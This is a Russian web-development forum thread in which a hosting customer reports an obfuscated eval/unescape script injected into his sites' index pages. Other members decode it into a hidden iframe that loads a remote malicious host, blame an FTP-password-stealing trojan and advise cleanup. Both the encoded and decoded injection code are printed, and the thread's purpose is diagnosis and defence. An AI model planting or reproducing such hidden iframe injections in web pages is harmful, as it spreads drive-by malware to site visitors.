|
|
Регистрация Восстановить пароль |
Регистрация | Задать вопрос |
Заплачу за решение |
Новые сообщения |
Сообщения за день |
Расширенный поиск |
Правила |
Всё прочитано |
|
Опции темы | Поиск в этой теме |
29.03.2008, 14:08 | #1 |
Пользователь
Регистрация: 26.03.2008
Сообщений: 14
|
Странный скрипт на страницах моих сайтов!
У меня хостинг, где размещены много сайтов, недавно на страницах "index.*" заметил странный скрипт, такого никогда лично не внедрял, даже некоторые страницы становится неработоспособными, если появляется дополнительный код, подскажите, пожалуйста, суть существования этого скрипта, что бы смог предпринимать подходящие меры безопасности, понятное дело что внешняя программное обеспечение записывала этот код, а может и нет?
Код между скобками: "<!-- o --><!-- c --><script>eval(unescape("%77%69%6e%6 4%6f%77%2e%73%74%61%74%75%73%3d%27% 44%6f%6e%65%27%3b%64%6f%63%75%6d%65 %6e%74%2e%77%72%69%74%65%28%27%3c%6 9%66%72%61%6d%65%20%6e%61%6d%65%3d% 65%35%37%32%62%63%30%20%73%72%63%3d %5c%27%68%74%74%70%3a%2f%2f%74%72%6 1%66%66%75%72%6c%2e%72%75%2f%73%6c% 69%76%3f%27%2b%4d%61%74%68%2e%72%6f %75%6e%64%28%4d%61%74%68%2e%72%61%6 e%64%6f%6d%28%29%2a%31%39%38%36%34% 38%29%2b%27%39%34%5c%27%20%77%69%64 %74%68%3d%35%33%34%20%68%65%69%67%6 8%74%3d%33%37%32%20%73%74%79%6c%65% 3d%5c%27%64%69%73%70%6c%61%79%3a%20 %6e%6f%6e%65%5c%27%3e%3c%2f%69%66%7 2%61%6d%65%3e%27%29")); </script>" |
29.03.2008, 15:18 | #2 |
Antimoderаtoris
Участник клуба
Регистрация: 08.02.2008
Сообщений: 1,251
|
Код HTML:
window.status='Done';document.write('<iframe name=e572bc0 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*198648)+'94\' width=534 height=372 style=\'display: none\'></iframe>')
98% из тысячи моих постов сделаны в профильном подфоруме. Я не накручиваю свои посты болтанием в "курилке", а ты?
|
29.03.2008, 16:26 | #3 | ||
*
Старожил
Регистрация: 22.11.2006
Сообщений: 9,201
|
http://1stat.ru/?domain=traffurl.ru
А вот что еще говорят наши импортные коллеги (http://www.developersdex.com/asp/mes...78&r=6157380): Цитата:
Цитата:
Последний раз редактировалось mihali4; 29.03.2008 в 16:30. |
||
29.03.2008, 17:05 | #4 |
Laravel/Vue expert
Старожил Подтвердите свой е-майл
Регистрация: 08.08.2007
Сообщений: 2,832
|
Это последствие работы троянчика, который ворует пароли к ФТП. Потом меняет все РНР страницы, размещенные в корневике сайта.
Не храните ваши пароли на локальном компе, особенно в Тотал Коммандере! Чтобы избавиться от дряни, уберите с каждого РНР-файла корневика сайта обфускаченный код, приведенный выше. А также, обязательно поменяйте пароль на ФТП. |
29.03.2008, 17:09 | #5 |
Laravel/Vue expert
Старожил Подтвердите свой е-майл
Регистрация: 08.08.2007
Сообщений: 2,832
|
Да, кстати, скрипт создает ифрейм, в котором запрограммирована вредоносная программа с использованием WSH и аджакса . Следовательно, код корректно будет работать только на Интернет Експлорере. Опять нам живой пример того, что тупой осел - еще тупее. Хотя сам аджакс написан и для "правильных" броузеров. На линуксе и других "правильных" системах - вирус работать не будет. А также, если юзер - не имеет прав админа.
Содержание ифрейма (для любопытных и иже с ними): Код:
Последний раз редактировалось SkyM@n; 29.03.2008 в 17:37. Причина: Сделал удобочитаемым |
29.03.2008, 17:22 | #6 |
Laravel/Vue expert
Старожил Подтвердите свой е-майл
Регистрация: 08.08.2007
Сообщений: 2,832
|
--cut here--
Код:
Как видите, написано умно. Везде есть проверка на баги. Чтобы не вызвать левых сообщений, ошибок и прочих неудобств пользователю...ради того, чтобы причинить еще больший вред Последний раз редактировалось SkyM@n; 29.03.2008 в 17:36. |
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
мой сайт взломали и в коды скриптов добавили вот этот скрипт. Что за скрипт? | nsbox | JavaScript, Ajax | 9 | 21.01.2010 18:19 |
Помогите с формулой! Сил уже нет моих ((( | runny | Microsoft Office Excel | 17 | 15.09.2008 16:20 |
Странный тип | Yuran | Общие вопросы Delphi | 4 | 10.06.2008 10:11 |